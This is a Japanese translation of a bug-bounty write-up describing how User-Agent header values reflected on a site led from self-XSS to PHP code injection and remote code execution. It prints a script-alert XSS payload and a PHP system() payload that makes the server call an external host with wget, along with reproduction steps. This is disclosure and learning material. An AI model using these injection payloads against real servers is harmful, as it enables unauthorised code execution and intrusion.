Shikata Ga Nai

Private? There is no such things.

How i made 15k$ from Remote Code Execution Vulnerabilityを訳してみた

Hello there, ('ω')ノ

 

リモートコード実行の脆弱性を。

 

脆弱性:

コードインジェクション、RCE、Self XSS

 

記事:

 https://amakki.me/how-i-made-15k-from-remote-code-execution-vulnerability-2e1b14b3902a

 

今回は、HackerOneプライベートプログラムの1つで。

リモートコード実行を見つけた方法を共有することに。

 

自分で脆弱性を見つけたい場合は、下記の脆弱なWebサイトで。

 https://labs.amakki.me

 

 

脆弱性を見つけた方法:

ウェブサイトのページのソースコードを調べていると。

すべてのページのスクリプトタグ内に私の情報が返され。

IPアドレス、ユーザエージェント、ブラウザが表示されていることに気付いて。

 

 

最初に頭に浮かんだのは、SelfXSSを見つけることで。

<script>alert(1)</script>をUser-Agentヘッダ値として追加して。

実行されるかどうかを確認するとできてしまって。

 

 

さらに探索中に、彼らのウェブサイトのページの1つが.php拡張子であり。

他のすべてのページと同じようにソースコードで自分の情報を。

返すことに気づいて。

 

そこで、Self XSSからRCEに移行できるかどうかを確認することにして。

次のコードを、User-Agentヘッダ値として記述すると。

うまくいって、サーバからリクエストを受け取って。

 <?php system(‘wget https://labs.amakki.me'); ?>

 

再現方法:

1.拡張子が.phpのページを開き、リクエストをインターセプトして。

2.User-Agentヘッダ値をコマンドを実行するPHPコードに変更すると。

3.コマンドが実行されて。

 

Best regards, (^^ゞ